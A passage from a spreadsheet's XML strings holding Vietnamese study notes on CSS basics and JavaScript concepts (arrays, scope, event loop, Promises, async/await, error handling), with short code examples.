Dùng ID: Khi bạn muốn xác định một thành phần duy nhất và đặc biệt (ví dụ: Logo, Thanh Menu, Chân trang). ID còn thường được dùng làm "mỏ neo" để cuộn trang hoặc dùng trong JavaScript để truy xuất nhanh một phần tử.</t>
  </si>
  <si>
    <t>selector trong css : Selector trong CSS là công cụ dùng để "chọn" các phần tử HTML mà bạn muốn áp dụng phong cách (style). Nó giống như việc bạn đọc một danh sách lớp và chỉ định: "Tất cả những người mặc áo sơ mi (selector) hãy đứng sang một bên để nhận đồng phục mới (style)".</t>
  </si>
  <si>
    <t>1. Nhóm Selector cơ bản (Hay dùng nhất)
Selector toàn bộ (*): Chọn tất cả các phần tử trên trang. Thường dùng để reset căn lề.
* { margin: 0; }
Selector thẻ (Element): Chọn trực tiếp tên thẻ HTML.
p { color: blue; } (Tất cả thẻ &lt;p&gt; sẽ có chữ màu xanh).
Selector Class (.): Chọn các thẻ có thuộc tính class. Có thể dùng nhiều lần.
.vung-tin { font-weight: bold; }
Selector ID (#): Chọn thẻ có thuộc tính id duy nhất.
#header { background: grey; }</t>
  </si>
  <si>
    <t>2. Nhóm Selector kết hợp (Combinators)
Dùng để chọn phần tử dựa trên mối quan hệ gia đình (cha, con, anh em).
Chọn con trực tiếp (&gt;): Chỉ chọn những con ngay sát bên trong cha.
div &gt; p (Chỉ chọn thẻ p là con trực tiếp của div).
Chọn tất cả con cháu (Khoảng trắng): Chọn mọi thẻ con, cháu, chắt... bên trong.
div p (Chọn tất cả thẻ p nằm trong div).
Chọn anh em liền kề (+): Chọn thẻ đứng ngay sau một thẻ khác.
h1 + p (Chọn thẻ p nằm ngay sau h1).</t>
  </si>
  <si>
    <t>4. Độ ưu tiên của Selector (Specificity)
Khi có nhiều Selector cùng trỏ vào một thẻ, CSS sẽ ưu tiên theo thứ tự "ai mạnh hơn thì thắng":
ID (Mạnh nhất)
Class / Pseudo-class
Thẻ (Element) (Yếu nhất)
Ví dụ: Nếu bạn đặt #tieude { color: red; } và .mau-xanh { color: blue; } cho cùng một thẻ, thẻ đó sẽ có màu đỏ vì ID mạnh hơn Class.</t>
  </si>
  <si>
    <t>box model trong html css</t>
  </si>
  <si>
    <t>Một cái "hộp" CSS gồm 4 lớp vỏ từ trong ra ngoài:
Content (Nội dung): Nơi chứa chữ, hình ảnh hoặc các thẻ con. Kích thước được xác định bởi width và height.
Padding (Vùng đệm): Khoảng trống bên trong hộp, nằm giữa nội dung và viền. Nó làm tăng kích thước tổng thể của hộp nhưng vẫn giữ màu nền của hộp.
Border (Viền): Đường kẻ bao quanh vùng đệm và nội dung.
Margin (Lề): Khoảng cách bên ngoài hộp dùng để đẩy các hộp khác ra xa. Nó là vùng trong suốt, không có màu nền.</t>
  </si>
  <si>
    <t>giải thích display : block, inline, inline-block</t>
  </si>
  <si>
    <t>1. display: block (Khối)
Thẻ này giống như một "viên gạch" lớn.
Đặc điểm: Luôn bắt đầu trên một dòng mới và chiếm hết chiều rộng của hàng đó (ngay cả khi nội dung rất ngắn).
Kích thước: Bạn có thể tự do đặt width và height.
Margin/Padding: Ăn đủ 4 hướng (trên, dưới, trái, phải).
Các thẻ mặc định: &lt;div&gt;, &lt;h1&gt; đến &lt;h6&gt;, &lt;p&gt;, &lt;ul&gt;, &lt;li&gt;.</t>
  </si>
  <si>
    <t>2. display: inline (Trên cùng một dòng)
Thẻ này giống như một "từ ngữ" trong một đoạn văn.
Đặc điểm: Không bắt đầu dòng mới. Nó chỉ chiếm diện tích vừa đủ với nội dung bên trong. Các thẻ inline sẽ nằm sát nhau trên cùng một hàng.
Kích thước: Không thể đặt width và height. Kích thước do nội dung quyết định.
Margin/Padding: Chỉ ăn theo chiều ngang (trái, phải). Chiều dọc (trên, dưới) sẽ không đẩy các phần tử khác ra xa được.
Các thẻ mặc định: &lt;span&gt;, &lt;a&gt;, &lt;strong&gt;, &lt;em&gt;.</t>
  </si>
  <si>
    <t>3. display: inline-block (Sự kết hợp hoàn hảo)
Đây là "đứa con lai" sở hữu ưu điểm của cả hai loại trên.
Đặc điểm: Giống inline ở chỗ nó không nhảy dòng, các thẻ nằm cùng hàng với nhau.
Kích thước: Giống block ở chỗ bạn có thể đặt width, height, margin, padding một cách đầy đủ.
Ứng dụng: Thường dùng để làm thanh Menu (Navigation) hoặc các danh sách sản phẩm nằm ngang mà vẫn muốn chỉnh kích thước từng ô.</t>
  </si>
  <si>
    <t>các phương thức xử lý mảng trong js</t>
  </si>
  <si>
    <t>1. Nhóm Duyệt và Biến đổi (Hay dùng nhất)
Đây là các phương thức "bất biến" (không làm thay đổi mảng gốc mà trả về kết quả mới).
map(): Tạo ra một mảng mới bằng cách thực thi một hàm lên từng phần tử của mảng cũ.
Ví dụ: Nhân đôi tất cả các số trong mảng.
filter(): Lọc ra các phần tử thỏa mãn một điều kiện nào đó và trả về mảng mới.
Ví dụ: Lấy ra các số lớn hơn 10.
reduce(): "Gom" tất cả phần tử trong mảng lại thành một giá trị duy nhất (số, chuỗi, hoặc object).
Ví dụ: Tính tổng các số trong mảng.
forEach(): Duyệt qua từng phần tử nhưng không trả về mảng mới. Thường dùng để log dữ liệu hoặc thực hiện hành động bên ngoài.</t>
  </si>
  <si>
    <t>2. Nhóm Tìm kiếm phần tử
find(): Trả về phần tử đầu tiên tìm thấy thỏa mãn điều kiện. Nếu không thấy trả về undefined.
findIndex(): Giống find nhưng trả về chỉ số (index) của phần tử đó.
includes(): Kiểm tra xem mảng có chứa một giá trị cụ thể hay không. Trả về true/false.
some(): Trả về true nếu có ít nhất một phần tử thỏa mãn điều kiện.
every(): Trả về true nếu tất cả phần tử đều thỏa mãn điều kiện.</t>
  </si>
  <si>
    <t>3. Nhóm Thêm/Xóa phần tử (Làm thay đổi mảng gốc)
push(): Thêm vào cuối mảng.
pop(): Xóa phần tử cuối mảng.
unshift(): Thêm vào đầu mảng.
shift(): Xóa phần tử đầu mảng.
splice(): Phương thức "đa năng" dùng để xóa, chèn hoặc thay thế phần tử tại bất kỳ vị trí nào.4. Nhóm Khác
sort(): Sắp xếp mảng (mặc định là theo chuỗi Alphabet).
concat(): Nối hai hoặc nhiều mảng lại với nhau.
join(): Biến mảng thành một chuỗi (String) nối với nhau bằng ký tự tự chọn.</t>
  </si>
  <si>
    <t>const numbers = [1, 2, 3, 4, 5];
// 1. Map: Nhân đôi
const doubled = numbers.map(n =&gt; n * 2); // [2, 4, 6, 8, 10]
// 2. Filter: Lấy số chẵn
const evens = numbers.filter(n =&gt; n % 2 === 0); // [2, 4]
// 3. Reduce: Tính tổng
const total = numbers.reduce((acc, curr) =&gt; acc + curr, 0); // 15
// 4. Find: Tìm số lớn hơn 3
const found = numbers.find(n =&gt; n &gt; 3); // 4</t>
  </si>
  <si>
    <t>String Immutable (Chuỗi bất biến) nghĩa là gì?</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>Bản chất:</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Trong JS, khi một chuỗi (String) đã được tạo ra trong bộ nhớ, bạn </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>không thể thay đổi từng ký tự đơn lẻ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> bên trong nó. Bạn chỉ có thể tạo ra một chuỗi mới hoàn toàn và gán đè lại vào biến.</t>
    </r>
  </si>
  <si>
    <t>let ten = "Hello";
// Cố tình sửa chữ H thành chữ M
ten[0] = "M"; 
console.log(ten); // Vẫn in ra: "Hello" (Lệnh đổi ký tự phía trên bị JS bơ đi, không có tác dụng)
// Cách đúng để đổi: Gán lại toàn bộ chuỗi mới
ten = "Mello";</t>
  </si>
  <si>
    <t>Function Declaration vs Function Expression</t>
  </si>
  <si>
    <t>Hai cách phổ biến nhất để tạo một hàm, khác nhau ở Hoisting (Khả năng gọi hàm trước khi viết code).
Function Declaration (Khai báo hàm): Dùng chữ function đứng đầu dòng. Hàm này bị kéo (hoist) lên tít trên cùng, nên bạn gọi hàm ở đâu cũng được.</t>
  </si>
  <si>
    <t>Function Expression (Biểu thức hàm): Lưu hàm vào một biến const hoặc let. Giống như biến, bạn phải viết nó ra rồi mới được phép gọi.</t>
  </si>
  <si>
    <t>// --- 1. Function Declaration ---
chaoHoi(); // CHẠY NGON LÀNH dù hàm viết ở dưới!
function chaoHoi() {
  console.log("Xin chào!");
// --- 2. Function Expression ---
// tinhTong(); // LỖI NGAY: Cannot access 'tinhTong' before initialization
const tinhTong = function() {
  console.log(1 + 1);
};
tinhTong(); // Viết dưới này mới được chạy</t>
  </si>
  <si>
    <t>Sự kỳ diệu của Arrow Function (() =&gt; {})Arrow Function không chỉ là cách viết tắt cho ngắn. Nó có 2 khác biệt cực kỳ lớn với function thường: Không có arguments và Không có this của riêng nó.</t>
  </si>
  <si>
    <t>A. Không có arguments (Danh sách tham số ẩn)
Hàm thường tự động có biến arguments gom mọi thứ bạn truyền vào. Arrow function thì không, bạn phải dùng Rest Operator ... // Hàm thường
function inThamSo() {
  console.log(arguments); // [1, 2, 3]
}
inThamSo(1, 2, 3);
// Arrow Function
const inThamSoMoi = (...args) =&gt; {
  // console.log(arguments); // Báo lỗi: arguments is not defined
  console.log(args); // [1, 2, 3] (Phải dùng ...args)
};
inThamSoMoi(1, 2, 3);</t>
  </si>
  <si>
    <t>B. Không có this (Cực kỳ quan trọng)
Hàm thường: this phụ thuộc vào ai là người gọi nó.
Arrow function: Không có this! Nó sẽ nhìn ra bên ngoài môi trường bao bọc nó (lexical scope) và xài ké this của hàm cha.</t>
  </si>
  <si>
    <t>const user = {
  ten: "Minh",
  // Dùng hàm thường
  inTenLoi: function() {
    setTimeout(function() {
      // Bên trong setTimeout, hàm thường bị mất 'this' (nó trỏ ra Window)
      console.log("Tên lỗi là: " + this.ten); 
    }, 1000);
  },
  // Dùng Arrow Function
  inTenChuan: function() {
    setTimeout(() =&gt; {
      // Arrow function xài ké 'this' của hàm inTenChuan() bên ngoài
      console.log("Tên chuẩn là: " + this.ten); 
    }, 1000);
  }
};
user.inTenLoi();   // Trả về: "Tên lỗi là: undefined"
user.inTenChuan(); // Trả về: "Tên chuẩn là: Minh"</t>
  </si>
  <si>
    <t>Callback Function và Higher-Order Function (HOF)</t>
  </si>
  <si>
    <t>Callback Function (Hàm gọi lại): Là một hàm được truyền vào một hàm khác dưới dạng tham số (parameter). Nó giống như việc bạn đưa số điện thoại cho nhân viên cửa hàng: "Khi nào có hàng thì gọi lại (call-back) cho tôi nhé".
Higher-Order Function (Hàm bậc cao): Là hàm nhận Callback Function làm tham số, hoặc là hàm trả về (return) một hàm khác.</t>
  </si>
  <si>
    <t>// 1. Đây là Callback Function (Hàm được truyền đi)
function chaoHoi(ten) {
  console.log("Xin chào, " + ten);
}
// 2. Đây là Higher-Order Function (Hàm nhận Callback)
function xuLyDuLieu(tenNguoiDung, hamXuLy) {
  console.log("Đang tải dữ liệu của " + tenNguoiDung + "...");
  // Sau khi xử lý xong, nó gọi hàm callback
  hamXuLy(tenNguoiDung); 
}
// Chạy thử:
xuLyDuLieu("An", chaoHoi); 
// Output: 
// Đang tải dữ liệu của An...
// Xin chào, An</t>
  </si>
  <si>
    <t>Lexical Scope và Scope Chain</t>
  </si>
  <si>
    <t>Lexical Scope (Phạm vi tĩnh): Trong JS, phạm vi của một biến được xác định ngay từ lúc bạn gõ code (vị trí vật lý), chứ không phải lúc hàm chạy. Một hàm con luôn có quyền truy cập vào các biến của hàm cha bọc nó.
Scope Chain (Chuỗi phạm vi): Khi bạn gọi một biến, JS sẽ tìm theo một dây chuyền từ trong ra ngoài:
Tìm trong hàm hiện tại xem có biến đó không.
Không có -&gt; Bò ra hàm cha bọc nó để tìm.
Không có -&gt; Bò ra ngoài cùng (Global scope).
Nếu tìm tới Global vẫn không có -&gt; Báo lỗi ReferenceError.</t>
  </si>
  <si>
    <t>let bienGlobal = "Tôi ở ngoài cùng";
function hamCha() {
  let bienCha = "Tôi ở hàm cha";
  function hamCon() {
    let bienCon = "Tôi ở hàm con";
    // hamCon không có 'bienCha' hay 'bienGlobal', nó phải nhìn ra ngoài (Scope Chain)
    console.log(bienCon);
    console.log(bienCha);   // Thành công (lấy từ hàmCha)
    console.log(bienGlobal); // Thành công (lấy từ Global)
  }
  hamCon();
  // console.log(bienCon); // LỖI! Hàm cha không thể thò tay vào hàm con lấy biến được.
}
hamCha();</t>
  </si>
  <si>
    <t>Debounce và Throttle ?</t>
  </si>
  <si>
    <t>Hai kỹ thuật kinh điển để tối ưu hiệu năng trang web khi người dùng thao tác quá nhanh (gõ phím, cuộn chuột).
Debounce (Gom nhóm): Giống như thang máy. Thang máy sẽ chờ 3 giây. Nếu có người bước vào, nó đếm lại từ đầu. Khi nào thực sự không còn ai bước vào nữa (user ngừng thao tác) thì thang máy mới chạy.</t>
  </si>
  <si>
    <t>Throttle (Giới hạn nhịp độ): Giống như tàu lượn siêu tốc. Cứ đúng 15 phút tàu chạy 1 chuyến. Dù trong 15 phút đó khách có bấm nút đòi chạy liên tục 1000 lần, tàu vẫn bơ đi.
Dùng cho: Bắt sự kiện Scroll, Resize cửa sổ (chỉ cho phép chạy hàm update UI tối đa 1 lần mỗi 200ms).</t>
  </si>
  <si>
    <t>Shallow Copy vs Deep Copy (Nông vs Sâu)</t>
  </si>
  <si>
    <t>Đây là nguồn gốc của 80% bug mất dữ liệu ở các bạn Dev mới!
Shallow Copy (Copy Nông): Khi bạn copy 1 Object, nó chỉ copy lớp ngoài cùng. Nếu bên trong Object đó lại chứa 1 Object con (Nested Object), thì Object con đó vẫn bị dùng chung bộ nhớ giữa bản gốc và bản sao.
Deep Copy (Copy Sâu): Cắt đứt hoàn toàn mọi liên kết. Bản gốc và bản sao độc lập 100% từ ngoài vào trong.</t>
  </si>
  <si>
    <t>Ví dụ Copy Nông (Dùng Spread Operator ...):
JavaScript
const goc = { 
  ten: "Minh", 
  diaChi: { thanhPho: "Hà Nội" } // Đây là Object con
};
// Copy nông bằng Spread
const banSao = { ...goc }; 
banSao.ten = "Lan"; // Đổi tên ở bản sao (Lớp ngoài) -&gt; Gốc không bị ảnh hưởng
banSao.diaChi.thanhPho = "HCM"; // Đổi thành phố (Lớp trong) -&gt; GỐC BỊ ĐỔI THEO LUÔN!
console.log(goc.diaChi.thanhPho); // "HCM" (Chết dở!)</t>
  </si>
  <si>
    <t>Cách giải quyết (Deep Copy):
Cách cũ (JSON.parse(JSON.stringify(obj))): Biến Object thành chuỗi Text, rồi biến Text ngược lại thành Object. Nhược điểm: Sẽ làm mất các key có giá trị là function, undefined, và làm sai ngày tháng (Date).
Cách chuẩn hiện đại (structuredClone()): API có sẵn của trình duyệt. Copy sâu hoàn hảo, giữ nguyên các kiểu dữ liệu phức tạp.</t>
  </si>
  <si>
    <t>// Copy sâu an toàn tuyệt đối!
const banSaoXin = structuredClone(goc);</t>
  </si>
  <si>
    <t>Mutate vs Non-Mutate Array (Biến đổi vs Không biến đổi)</t>
  </si>
  <si>
    <t>Khi gọi một hàm xử lý mảng, bạn phải biết nó có "chạm" vào mảng gốc hay không.
Mutate (Biến đổi mảng gốc): push, pop, splice, sort, reverse. Khi dùng các hàm này, mảng ban đầu của bạn sẽ bị thay đổi vĩnh viễn. (Trong React, việc vô tình mutate mảng gốc là tối kỵ vì nó làm UI không cập nhật).</t>
  </si>
  <si>
    <t>Non-Mutate (Trả về mảng mới, mảng gốc an toàn): map, filter, slice, concat.</t>
  </si>
  <si>
    <t>slice() vs splice()</t>
  </si>
  <si>
    <t xml:space="preserve">slice (Lát cắt): "Cắt" lấy một khúc của mảng để tạo ra mảng mới. Hoàn toàn không ảnh hưởng mảng gốc (Non-mutate).
splice (Mối nối): Chọc thẳng vào mảng gốc để cắt bỏ hoặc nhét thêm phần tử. Làm biến đổi mảng gốc (Mutate).
</t>
  </si>
  <si>
    <t>const traiCay = ["Táo", "Cam", "Chuối", "Nho"];
// SLICE: Lấy từ vị trí số 1 đến số 3 (Không lấy số 3)
const layRa = traiCay.slice(1, 3); 
console.log(layRa); // ["Cam", "Chuối"]
console.log(traiCay); // ["Táo", "Cam", "Chuối", "Nho"] (Gốc CÒN NGUYÊN)
// SPLICE: Bắt đầu từ vị trí số 1, xóa đi 2 phần tử
traiCay.splice(1, 2);
console.log(traiCay); // ["Táo", "Nho"] (Gốc ĐÃ BỊ THAY ĐỔI)</t>
  </si>
  <si>
    <t>Lỗi kinh điển khi dùng sort()</t>
  </si>
  <si>
    <t>Theo mặc định, hàm sort() của JS ép mọi thứ thành Chuỗi (String) rồi mới sắp xếp theo bảng chữ cái (Alphabet). Chứ nó không hiểu Toán học!</t>
  </si>
  <si>
    <t>const so = [10, 2, 30, 1];
so.sort(); 
console.log(so); 
// Kết quả: [1, 10, 2, 30] (Vì chữ "10" đứng trước chữ "2" trong từ điển!)
// CÁCH SẮP XẾP SỐ CHUẨN: Bắt buộc phải truyền Callback Function
so.sort((a, b) =&gt; a - b); // Tăng dần (Nếu muốn giảm dần thì b - a)
console.log(so); // [1, 2, 10, 30] (Chuẩn!)</t>
  </si>
  <si>
    <t>map vs filter vs reduce và forEach</t>
  </si>
  <si>
    <t>Đây là "bộ ba nguyên tử" của Array.
forEach: Duyệt qua mảng để làm một hành động gì đó (ví dụ: console.log), trả về undefined.
map: Biến đổi từng phần tử và trả về mảng mới CÙNG độ dài.
filter: Lọc các phần tử thỏa mãn điều kiện, trả về mảng mới (có thể NGẮN HƠN).
reduce: Quét qua mảng và nhồi nhét, cộng dồn tất cả lại thành MỘT giá trị duy nhất (một số, một chuỗi, hoặc một object gom nhóm).</t>
  </si>
  <si>
    <t>const gioHang = [
  { ten: "Chuột", gia: 200 },
  { ten: "Bàn phím", gia: 500 },
  { ten: "Lót chuột", gia: 50 }
];
// 1. Dùng map: Tạo mảng mới chỉ chứa Tên sản phẩm
const tenSanPham = gioHang.map((item) =&gt; item.ten);
// Kết quả: ["Chuột", "Bàn phím", "Lót chuột"]
// 2. Dùng filter: Chỉ lấy món đồ &gt; 100k
const doDatTien = gioHang.filter((item) =&gt; item.gia &gt; 100);
// Kết quả: Mảng chứa [Chuột, Bàn phím]
// 3. Dùng reduce: Tính tổng tiền giỏ hàng
// acc (accumulator) là biến tích lũy, bắt đầu từ 0
const tongTien = gioHang.reduce((acc, item) =&gt; acc + item.gia, 0);
// Kết quả: 750</t>
  </si>
  <si>
    <t>Call Stack và Memory Heap (Nơi làm việc và Nhà kho)</t>
  </si>
  <si>
    <t>JavaScript Engine (như V8 trong Chrome) có 2 khu vực chính để hoạt động:
Memory Heap (Nhà kho): Một vùng bộ nhớ rộng lớn, lộn xộn. Nó dùng để cấp phát chỗ ở cho các dữ liệu phức tạp (Object, Array, Function) khi bạn khởi tạo chúng.</t>
  </si>
  <si>
    <t>function hamA() { console.log("Chạy A"); }
function hamB() { hamA(); console.log("Chạy B"); }
hamB(); 
// Thứ tự trong Call Stack:
// 1. Đẩy hamB vào Stack
// 2. hamB gọi hamA -&gt; Đẩy hamA lên TRÊN hamB
// 3. hamA chạy xong (in "Chạy A") -&gt; Đá hamA ra khỏi Stack
// 4. hamB chạy tiếp (in "Chạy B") -&gt; Đá hamB ra khỏi Stack
// 5. Stack trống rỗng!</t>
  </si>
  <si>
    <t>Event Loop, Web APIs và Task Queues (Trái tim của JS)</t>
  </si>
  <si>
    <t>Nếu JS chỉ làm được 1 việc cùng lúc, thì khi ta gọi API tốn mất 5 giây, tại sao trang web không bị đơ (đóng băng)? Đó là nhờ "sự trợ giúp của người thân" (Trình duyệt) và Event Loop.
Web APIs: Trình duyệt cung cấp các công cụ chạy ở "luồng phụ" bên ngoài JS (như setTimeout, fetch gọi API, DOM events). Khi JS gặp setTimeout, nó đẩy việc đếm ngược này cho Web APIs làm hộ, rồi JS đi làm việc khác.</t>
  </si>
  <si>
    <t>Hàng đợi (Queues): Khi Web APIs làm xong (vd: đếm xong 5 giây), nó không được phép vứt kết quả thẳng vào Call Stack đang bận rộn. Nó phải xếp hàng ở hàng đợi. Có 2 loại hàng đợi:
Microtask Queue (Hàng đợi VIP): Chứa các callback của Promise (.then, .catch), queueMicrotask.
Macrotask Queue (Hàng đợi Thường - hay gọi là Task Queue): Chứa các callback của setTimeout, setInterval, sự kiện click.</t>
  </si>
  <si>
    <t>Event Loop (Bảo vệ gác cổng): Nó làm một vòng lặp vô tận với quy tắc vàng sau:
Nhìn xem Call Stack đã trống chưa? Nếu trống, đi tiếp.
Nhìn vào Microtask Queue (VIP). Nếu có ai xếp hàng, cho TẤT CẢ bọn họ vào Call Stack chạy cho đến khi hàng đợi VIP trống trơn.
Chỉ khi hàng đợi VIP đã hết sạch, nó mới nhìn sang Macrotask Queue (Thường), và lấy ĐÚNG 1 TÁC VỤ đầu tiên cho vào Call Stack. Xong lại quay về bước 1.</t>
  </si>
  <si>
    <t>Code kinh điển: Đoán thứ tự chạy</t>
  </si>
  <si>
    <t>console.log("1. Đồng bộ chạy trước");
setTimeout(() =&gt; {
  console.log("2. Macrotask (setTimeout)");
}, 0);
Promise.resolve().then(() =&gt; {
  console.log("3. Microtask (Promise 1)");
}).then(() =&gt; {
  console.log("4. Microtask (Promise 2)");
});
console.log("5. Đồng bộ kết thúc");</t>
  </si>
  <si>
    <t>Thứ tự thực thi:
Code đồng bộ vào thẳng Call Stack chạy ngay: In ra 1 và 5.
setTimeout bị ném sang Web APIs, sau đó đẩy callback vào Macrotask Queue (Thường).
Promise đẩy 2 cái .then vào Microtask Queue (VIP).
Call stack rỗng. Event Loop ưu tiên mời VIP vào trước: In ra 3 rồi in tiếp 4.
VIP sạch sẽ rồi. Event Loop mới gọi khách Thường: In ra 2.
Kết quả: 1 -&gt; 5 -&gt; 3 -&gt; 4 -&gt; 2. (Hãy ghi nhớ kỹ ví dụ này!)</t>
  </si>
  <si>
    <t>Promise là gì? (Lời hứa)</t>
  </si>
  <si>
    <t>Bản chất: Giống như đi mua trà sữa. Bạn trả tiền, nhân viên đưa bạn cái hóa đơn có số thứ tự (Đây là Promise). Bạn cầm hóa đơn đứng chờ, trong lúc chờ bạn vẫn có thể lướt TikTok (Không bị đơ code).
Khi có nước, nhân viên gọi tên bạn.</t>
  </si>
  <si>
    <t>3 Trạng thái của Promise:
Pending (Đang chờ): Bạn đang đứng chờ nước (API đang gọi, chưa có kết quả).
Fulfilled (Hoàn thành): Có nước! Lời hứa thành công. Dữ liệu sẽ nhảy vào hàm .then().
Rejected (Thất bại): Hết trân châu! Lời hứa thất bại (bị lỗi). Lỗi sẽ nhảy vào hàm .catch().</t>
  </si>
  <si>
    <t>Sự ra đời của Async/Await</t>
  </si>
  <si>
    <t>Dù có .then() và .catch(), nếu gọi API liên tiếp nhau, code vẫn sinh ra chuỗi lồng nhau nhìn khá rối. Từ ES8, JS cung cấp async/await.
Bản chất: Nó là "lớp vỏ bọc" (syntactic sugar) cho Promise. Nó giúp bạn viết code bất đồng bộ (chờ API) mà nhìn y hệt như code đồng bộ tuần tự từ trên xuống dưới.
Cách dùng: Hàm nào có xài await (chờ) thì bắt buộc trước chữ function phải có chữ async.
Xử lý lỗi: Vì không dùng .catch() nữa, ta phải dùng cặp try...catch.</t>
  </si>
  <si>
    <t>// Thay vì viết:
function layDuLieuCu() {
  fetch("https://api.example.com/user")
    .then(response =&gt; response.json())
    .then(data =&gt; console.log(data))
    .catch(error =&gt; console.log("Lỗi:", error));
}
// Ta viết theo chuẩn Async/Await hiện đại:
async function layDuLieuMoi() {
  try {
    // Luồng code sẽ "tạm dừng" ở chữ await này cho đến khi API tải xong
    const response = await fetch("https://api.example.com/user");
    const data = await response.json();
    console.log(data); 
  } catch (error) {
    // Nếu có bất kỳ dòng await nào phía trên bị lỗi (Rejected), nó sẽ văng thẳng xuống đây
    console.log("Lỗi:", error);
  }
}</t>
  </si>
  <si>
    <t>Cuộc đua của các Promise: all, allSettled, race, any</t>
  </si>
  <si>
    <t>Khi bạn có nhiều API cần gọi (Ví dụ: Tải thông tin User, tải Giỏ hàng, tải Gợi ý sản phẩm), thay vì chờ từng cái một, ta cho chúng chạy song song để tiết kiệm thời gian.
Promise.all (Tất cả hoặc Không có gì): Chờ tất cả Promise chạy xong. Nếu TẤT CẢ thành công -&gt; Trả về mảng kết quả. Nếu chỉ 1 cái thất bại -&gt; Nó hủy ngay lập tức và ném lỗi (Reject) mà không thèm đợi những cái kia.
Promise.allSettled (Bao dung): Chờ tất cả chạy xong, bất kể thành công hay thất bại. Trả về một mảng báo cáo chi tiết trạng thái của từng cái.
Promise.race (Đua xe): Cái nào chạy xong ĐẦU TIÊN (bất kể thành công hay thất bại) thì lấy luôn kết quả của cái đó, bỏ qua đám còn lại. Dùng để làm tính năng Timeout (Hủy request nếu gọi API quá 5 giây).
Promise.any (Tìm người sống sót): Cái nào THÀNH CÔNG đầu tiên thì lấy. Bỏ qua các cái bị lỗi. (Chỉ ném lỗi nếu tất cả đều thất bại).</t>
  </si>
  <si>
    <t>const apiNhanh = new Promise(resolve =&gt; setTimeout(() =&gt; resolve("Nhanh"), 1000));
const apiLoi = new Promise((_, reject) =&gt; setTimeout(() =&gt; reject("LỖI!"), 2000));
const apiCham = new Promise(resolve =&gt; setTimeout(() =&gt; resolve("Chậm"), 3000));
// -- Dùng Promise.all: Sẽ văng lỗi ở giây thứ 2 do apiLoi bị reject
Promise.all([apiNhanh, apiLoi, apiCham])
  .then(res =&gt; console.log(res))
  .catch(err =&gt; console.log("Promise.all thất bại vì:", err));
// -- Dùng Promise.race: apiNhanh về đích trước ở giây 1
Promise.race([apiNhanh, apiLoi, apiCham])
  .then(res =&gt; console.log("Người thắng cuộc là:", res)); // In ra: Nhanh</t>
  </si>
  <si>
    <t>Callback Hell là gì?</t>
  </si>
  <si>
    <t>Bản chất: Là tình trạng các hàm callback bị lồng vào nhau quá nhiều tầng (cái này chờ cái kia xong mới chạy tiếp). Code sẽ bị thụt lề liên tục tạo thành hình chữ V nằm ngang, được giới lập trình gọi là "Kim tự tháp chết chóc" (Pyramid of Doom).
Hậu quả: Code cực kỳ khó đọc, khó sửa lỗi và khó bảo trì.</t>
  </si>
  <si>
    <t>// Viết bằng Callback kiểu cũ: Nhìn lác cả mắt!
layThongTinUser(1, function(user) {
  layGioHang(user.id, function(gioHang) {
    thanhToan(gioHang.tongTien, function(ketQua) {
      guiEmailXacNhan(user.email, function() {
        console.log("Xong hết rồi! Nhức đầu quá!");
      });
    });
  });
});</t>
  </si>
  <si>
    <t>(Để giải quyết Callback Hell, người ta đã phát minh ra Promise và sau này là async/await để code trở lại dạng phẳng).</t>
  </si>
  <si>
    <t>try/catch có bắt được lỗi async không?</t>
  </si>
  <si>
    <t>Câu trả lời là: Vừa KHÔNG, vừa CÓ. (Đây là câu hỏi gài bẫy).
KHÔNG: Nếu đó là hàm async kiểu cũ (như setTimeout, setInterval). try/catch chạy đồng bộ nên nó chạy qua cái rẹt, không thể đứng chờ 2 giây để bắt lỗi của setTimeout được.
CÓ: Nếu bạn dùng nó chung với từ khóa await cho các Promise.</t>
  </si>
  <si>
    <t>try {
  setTimeout(() =&gt; {
    throw new Error("Lỗi nổ bùm!"); 
  }, 1000);
} catch (err) {
  console.log("Đã bắt được lỗi"); // Dòng này KHÔNG BAO GIỜ chạy! Lỗi vẫn văng ra ngoài.
}</t>
  </si>
  <si>
    <t>try {
  // Nhờ có chữ 'await', try/catch sẽ đứng kiên nhẫn chờ API chạy xong
  await fetch("https://api-bi-loi.com"); 
} catch (err) {
  console.log("Bắt lỗi thành công!"); // Chạy ngon lành!
}</t>
  </si>
  <si>
    <t>Web API là gì trong browser?</t>
  </si>
  <si>
    <t>Bản chất: JavaScript bản thân nó CHỈ là một ngôn ngữ tính toán (cộng trừ nhân chia, xử lý mảng/object...). Nó không hề biết về việc thao tác với màn hình (DOM), không biết hẹn giờ, không biết gọi mạng!</t>
  </si>
  <si>
    <t>Tất cả những thứ như document.getElementById, setTimeout, fetch(), localStorage không thuộc về JS. Chúng là các "đồ chơi" (Web APIs) do Trình duyệt (Browser) viết sẵn bằng ngôn ngữ C++ và đưa cho JS mượn để sử dụng.</t>
  </si>
  <si>
    <t>Error object trong JS gồm gì?</t>
  </si>
  <si>
    <t>Khi có lỗi xảy ra, JS tự động ném ra một Object báo lỗi. Object này có 3 thuộc tính quan trọng nhất:
name: Tên loại lỗi (VD: ReferenceError, TypeError).
message: Dòng tin nhắn mô tả chi tiết lỗi bằng tiếng người.
stack: (Quan trọng nhất) Dấu vết ngăn xếp. Nó chỉ rõ lỗi bắt nguồn từ file nào, dòng số mấy, bị gọi bởi hàm nào.</t>
  </si>
  <si>
    <t>try {
  bienKhongTonTai;
} catch (err) {
  console.log(err.name);    // "ReferenceError"
  console.log(err.message); // "bienKhongTonTai is not defined"
  console.log(err.stack);   // Chi tiết file và số dòng bị lỗi
}</t>
  </si>
  <si>
    <t>Error boundary trong React có bắt lỗi async không?</t>
  </si>
  <si>
    <t>KHÔNG. (Đây là một cái bẫy phỏng vấn cực hay).
Error Boundary (Ranh giới lỗi) trong React chỉ bắt được lỗi xảy ra trong quá trình Render UI và trong các Lifecycle/Hooks.</t>
  </si>
  <si>
    <t>Nó KHÔNG THỂ bắt được lỗi xảy ra trong:
